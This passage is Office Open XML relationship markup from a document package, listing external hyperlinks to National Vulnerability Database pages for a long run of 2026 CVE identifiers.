Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76957" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80112" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId1001" /><Relationship 